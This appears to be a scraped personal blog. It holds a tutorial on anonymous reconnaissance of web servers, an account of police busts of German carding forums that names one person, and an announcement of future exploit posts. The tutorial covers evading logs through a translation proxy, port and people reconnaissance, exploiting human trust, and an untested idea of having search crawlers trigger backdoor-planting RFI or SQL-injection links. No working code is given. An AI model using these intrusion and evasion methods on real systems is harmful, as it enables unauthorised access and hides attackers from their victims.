Howto hack the server and not get caught

Hi there,
In my first Blog Post I want to talk about a quick way to

"Hack the Server"

of any given website, only using web-based services available for everbody.
So Why would we want to do this?
- Its avalibale from everywhere (Libarys,Schools,Museums ... )
- Its completly anonymous (you can find out alot without even going to the Site)
- Its quick
- Its clean (leaves no traces in Logfiles)
Note:Please only use these Techniques on Networks you own or are allowed to pwn.

1)Ensoure your own Anonymity(at least at some grade).
We will be using Google translate as our web proxy
http://translate.google.de/translate?hl=en&sl=de&tl=en&u=wieistmeineip.de

//Of course your request will be logged on googles server, but target server are only going to see a request from a google ip address.

2)Find out Whats behinde the Server and Domain.
For this we are going to use
http://centralops.net/co/DomainDossier.aspx

It gives us ALOT of info about the domain and also some Basic info about the Services running and a traceroute.
//We will get to how to use the collected info later.

After that we will try to find out even more about the Services with:
http://ping.eu/port-chk/
Some intersting Ports:
sql:1433(MySql),5432(PortgreSql),1521(Oracle)
remote acces:3389(Remote Desktop),22,23

Alright we now know alot about the Domain and the Server but if we need to know even more:
http://www.iptools.com/
Is THE most complete website for online ip tools.

3)Find out about the Web-Apps.
Well Here it could get tricky for some Sites, and this task is slow.
However it should still be noted.
You could try using google dorks for that,to save time use blackl.com instead of google.com (this is a real gem, basicly its google, but wihout filtering/blocking requests).
And a list of dorks OR you use Goolag from the CDC(mutch faster, however you'll have to download this).

4)Finding out about the People
You can use online People searches:
http://pipl.com/
http://people.yahoo.com/
Social networks:
http://yoname.com/
Metacrawler:
http://www.metacrawler.com/
The best tool to do this is Maltego from Paterva(has to be downloaded):
http://www.paterva.com/

With the Info about the People you can try to search for forum and newsgroup posts form them, witch could contain info about the technology they are using.
Remeber:If you traget the people then exploit the trust.

5)Use the Info
With the Information gatherd you can find the Actual Vulnerabiltys:
http://osvdb.org/
http://www.exploit-db.com/
http://www.3xpl01t.com/

6)Exploit the host
This can not really be done without leaving traces in Logs, but there are some ways that allow an attacker to preform this task in an very anonymous way!
For example an attacker could craft a Link for placing a backdoor ,example in case of an RFI,OS Command exec. or an SQLI, that would (if executed) place a Backdoor on the system, then that link is posted somewhere on the net.
Some search robot will pick it up and follow the Link, by this the url is executed by the crawler and the Server is owend.
I have never done this or seen a case where it has been used, however i think its possible to do.

Have fun!
More Tutorials will follow.

The case:German Underground Cyber Market

Hi there,
Today I want to talk about the downfalls and rises in the German underground market.
When I started looking at the topic of information security and IT generally,
there was a big forum called "hacksector.cc", the admin(m0rphin)that started out as a small seller of stolen credit cards, also was a drug addict with very serious health problems.
If you wonder what he looks like:
http://www.youtube.com/watch?v=fCEHgu_Pv9Y
http://www.youtube.com/watch?v=Fk9nFj_E_hA
Right now he's in jail, why?
Well, not only because of the fraud and internet crime, but also because of drug related crimes.
Infact he anouncend in the non public areas of his forum that he tought he would die and even made jokes about it.

How did he get busted?
Accses to his forum was soled for only 700€ by the techadmin, after that the person who had bought accses than started selling backups for a high price and so he even made money with this, he was motevadet by revenge and since logging wasen't shut off, m0rphin (and several other crew members) got busted.
There was alot of confusion going on why, since it reads in german law books that illeagly earned information shall not be used("Fruit of the poisions tree" it reads in American law books).
Since they were no law experts but experts in doing bullshit, they didn't understand that in fact it was up to how serieus the crime was whether the info is beeing used or not.
So this means - small fishes get away big ones get busted.

Alright this was case Number 1.

After that happend alot of people left the german underground scene,
it was a strong strike against the german underground espacially since people had never before experienst troubles like this.
But there was a new force on its way to become the number 1 forum for internet crime.
IT's name "1337-crew".
When i first stumbeld accrose this forum i honestly thought this was a parody forum about the german crime scene.
The postes made by the admin "13speedtest37" were of very poor quality.
At that time he was only known for selling credit card numbers, and as the admin of a small crime forum.
But because it was designed as a marketplace it started growing,speedtest made it possible for everybody to buy and sell on his forum.
And he was stabalisying the prices for credit cards, he at that time allready made thousand of euros per month as a student.

The bust:
Now i could write ALOT about this.
Since I was very active in the debates about his bust, I could talk about the gomopa scandal and the tons of false info(maybe im going to do that later).
But it is way more important to know why mr.dominik baur (aka. 13speedtest37) got busted.
He got busted because he went to his own server without a proxy or vpn so his ip appeard in clear text in the logs.
Why did he do that???
(you may ask)
Well because he tought he was secure,
he was hosting on a russian server providet by 2x4.ru, wich didn't give out any info about him, his server was (at least he tought that) secure and the law was on his side since if the data base would get in the hands of the german bka they couldn't use the evidence(he thought).
You see it was his personal failury of not studiying the law as well as the failurie of 50 other persons that got busted 3 days after the hack.

And why didn't he know about the law?
That is the big question! Why did nobody know that, i think that there were a cople of points that lead to this:
1)- There are no real law expertes in the undergorund
2)- The culture in the underground didn't want to hear the truth.
3)- They were not curious enough about "hacksector.cc"'s case
4)- A certain amount of time elapsed between the hack and the bust.
5)- And most important the bka didn't want them to know, so they designed there press info in a way that let it open why they got busted.

I don't know if these point are correct, but I think they are.

How did the scene reacte?
Mixed, one very famous qoute is "he was the hitler of the german undergournd scene",
other were sad that there idol wasn't present in the underground anymore.
An interesting thing:
The scene recoverd very quick they had lerand from previeus case.
Just like the bka wich reacted 20 times faster then before, they also recoverd 20 times better.

Emidantily they started swapping to another forum called "carders.cc" witch a short time ago got hacked by the same people 1337-crew get hacked.
But jet no busts, interesting!
We'll see what happends.
So long ...

Announcements

Hi there,
Just wanted to tell you whats going to happend on this Blog,
Im going to Post interesting ways of doing security stuff as well as news about Cybercrime biz and the IT-Security industry.
-1 Post per Week
-50% news/biz 50% tutorials/exploits/tools

If you have Suggestions/Notes about the Blog or the Info published here email me tfrosted [\at\] googlemail.com.

Howto

----